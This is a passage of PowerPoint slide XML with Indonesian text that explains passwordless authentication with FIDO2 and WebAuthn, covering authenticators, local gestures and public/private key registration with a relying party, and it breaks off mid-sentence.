              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OTP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. FIDO2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>WebAuthn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Cara </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerjanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelajah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Face ID/Touch ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> macOS dan iOS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfirmasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Gerakan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sidik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengenalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PIN. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>divalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendaftar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendaftarkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaitkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihadapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
